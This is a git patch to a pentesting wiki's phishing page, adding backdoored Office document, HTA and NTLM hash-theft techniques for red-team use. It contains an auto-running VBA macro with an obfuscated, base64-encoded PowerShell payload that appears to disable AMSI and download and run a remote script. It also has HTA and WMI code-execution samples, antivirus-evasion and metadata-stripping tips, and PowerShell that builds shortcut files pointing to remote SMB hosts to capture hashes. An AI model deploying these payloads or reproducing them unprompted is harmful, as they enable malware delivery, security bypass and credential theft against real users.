From fb0f753c2c15b19b51693c55446549fd00306fbf Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 3 Sep 2022 09:30:58 +0000 Subject: [PATCH] GitBook: [#3452] No subject --- SUMMARY.md | 2 +- .../phishing-methodology/README.md | 11 +- .../phishing-documents.md | 139 ++++++++++++++++-- .../ntlm/places-to-steal-ntlm-creds.md | 7 + 4 files changed, 143 insertions(+), 16 deletions(-) diff --git a/SUMMARY.md b/SUMMARY.md index 2b570c709..2db23a4cf 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -24,7 +24,7 @@ * [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md) * [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md) * [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md) - * [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md) + * [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md) * [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md) * [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md) * [Anti-Forensic Techniques](forensics/basic-forensic-methodology/anti-forensic-techniques.md) diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index 3d24e6e95..777afdc38 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md @@ -1,7 +1,5 @@ # Phishing Methodology -## Phishing Methodology -
Support HackTricks and get benefits! @@ -437,6 +435,15 @@ If for any reason you want to clone the website check the following page: [clone-a-website.md](clone-a-website.md) {% endcontent-ref %} +## Backdoored Documents & Files + +In some phishing assessments (mainly for Red Teams) you will want to also **send files containing some kind of backdoor** (maybe a C2 or maybe just something that will trigger an authentication).\ +Check out the following page for some examples: + +{% content-ref url="phishing-documents.md" %} +[phishing-documents.md](phishing-documents.md) +{% endcontent-ref %} + ## Phishing2.0 The previous attack is pretty clever as you are faking a real website and gathering the information set by the user. Unfortunately, if the user didn't put the correct password or if the application you faked is configured with 2FA, **this information won't allow you to impersonate the tricked user**. diff --git a/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 731a76312..d554786fb 100644 --- a/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -1,4 +1,4 @@ -# Phishing Documents +# Phishing Files & Documents
@@ -16,6 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Office Documents + Microsoft Word performs file data validation prior to opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened. Usually Word files containing macros uses the `.docm` extension. However, it's possible to rename the file changing the file extension and still keep their macro executing capabilities.\ @@ -30,22 +32,43 @@ assoc | findstr /i "word excel powerp" DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well. -### Word with external image +### External Image Load Go to: _Insert --> Quick Parts --> Field_\ _**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\/whatever ![](<../../.gitbook/assets/image (316).png>) -### Macros Code +### Macros Backdoor -``` +It's possible to use macros to run arbitrary code form the document. + +#### Autoload functions + +The more common they are, the more probable the AV will detect it. + +* AutoOpen() +* Document\_Open() + +#### Macros Code Examples + +```vba Sub AutoOpen() CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=") End Sub ``` -```bash +```vba +Sub AutoOpen() + + Dim Shell As Object + Set Shell = CreateObject("wscript.shell") + Shell.Run "calc" + +End Sub +``` + +```vba Dim author As String author = oWB.BuiltinDocumentProperties("Author") With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-") @@ -53,19 +76,109 @@ With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-") .StdIn.WriteBlackLines 1 ``` -## Autoload functions +```vba +Dim proc As Object +Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") +proc.Create "powershell +``` -The more common they are, the more probable the AV will detect it. +#### Manually remove metadata -* AutoOpen() -* Document\_Open() +Fo to **File > Info > Inspect Document > Inspect Document**, which will bring up the Document Inspector. Click **Inspect** and then **Remove All** next to **Document Properties and Personal Information**. -## Malicious Macros Generators +#### Doc Extension -### MacOS +When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\ +Do this because you **can't save macro's inside a `.docx`** and there's a **stigma** **around** the macro-enabled **`.docm`** extension (e.g. the thumbnail icon has a huge `!` and some web/email gateway block them entirely). Therefore, this **legacy `.doc` extension is the best compromise**. -* [**macphish**](https://github.com/cldrn/macphish) -* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator) +#### Malicious Macros Generators + +* MacOS + * [**macphish**](https://github.com/cldrn/macphish) + * [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator) + +## HTA Files + +An HTA is a proprietary Windows program whose **source code consists of HTML and one or more scripting languages** supported by Internet Explorer (VBScript and JScript). The HTML is used to generate the user interface and the scripting language for the program logic. An **HTA executes without the constraints of the browser's security model**, so it executes as a "fully trusted" application. + +An HTA is executed using **`mshta.exe`**, which is typically **installed** along with **Internet Explorer**. In fact, **`mshta` is dependant on IE**, so if it has been uninstalled, HTAs will be unable to execute. + +
<--! Basic HTA Execution -->
+<html>
+  <head>
+    <title>Hello World</title>
+  </head>
+  <body>
+    <h2>Hello World</h2>
+    <p>This is an HTA...</p>
+  </body>
+
+  <script language="VBScript">
+    Function Pwn()
+      Set shell = CreateObject("wscript.Shell")
+      shell.run "calc"
+    End Function
+
+    Pwn
+  </script>
+</html>
+
+ +```html +<--! Cobal Strike generated HTA withot shellcode --> + +``` + + + +## Forcing NTLM Authentication + +There are several ways to **force NTLM authentication "remotely"**, for example you could add **invisible images** to emails or HTMLs that the user will access (even HTTP MitM?). Or send the victim the **address of files** that will **trigger** an **authentication** just for **opening the folder.** + +**Check this ideas and more in the following pages:** + +{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} +[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md) +{% endcontent-ref %} + +{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %} +[places-to-steal-ntlm-creds.md](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md) +{% endcontent-ref %} + +### NTLM Relay + +Don't forget that you cannot only steal the hash or the authentication, but also **perform NTLM relay attacks**: + +* [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)**** +* ****[**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)****
diff --git a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md index 97a9256c8..1462bcc81 100644 --- a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md +++ b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md @@ -255,6 +255,7 @@ sc.Save The Powershell version. ```powershell +#TargetPath attack $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" @@ -263,6 +264,12 @@ $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "I will Steal your Hashes" $lnk.HotKey = "Ctrl+Alt+O" $lnk.Save() + +#IconLocation Attack +$wsh = new-object -ComObject wscript.shell +$shortcut = $wsh.CreateShortcut("\\dc\software\test.lnk") +$shortcut.IconLocation = "\\10.10.10.10\test.ico" +$shortcut.Save() ``` ## Internet Shortcuts (.url)